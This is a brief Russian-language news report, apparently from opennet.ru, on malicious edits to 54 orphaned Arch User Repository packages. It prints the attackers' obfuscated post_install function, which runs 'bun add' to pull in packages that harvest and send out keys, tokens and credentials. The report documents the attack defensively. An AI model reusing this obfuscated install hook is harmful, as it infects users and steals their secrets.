Несмотря на меры, предпринятые разработчиками Arch Linux, деятельность по подстановке вредоносного кода в репозитории AUR (Arch User Repository) не остановлена. Несколько часов назад вредносный код подставлен ещё в 54 пакета, оставшихся без сопровождающих (история отмены вредоносных правок). В отличие от позавчерашних атак, вместо пакетного менеджера npm для установки вредоносных зависимостей на этот раз задействована платформа bun. Для обхода реализованных фильтров в функцию post_install вставляется обфусцированная строка, в которой вызывается команда «bun add» для установки пакетов с вредоносным кодом, осуществляющим сканирование и отправку на внешний сервер ключей, токенов и учётных данных.
post_install() {
$’\x63′»d» «/»‘t'»m»‘p’ && «b»‘u»n’ ‘a'»d»‘d’ $’\141\x6e»s'»i»»-«$’\143»o»l»o»r’$’\x73′ ‘n'»e»‘x'»t»»f»‘i»l»e»-»j»s’
}
Source: opennet.ru
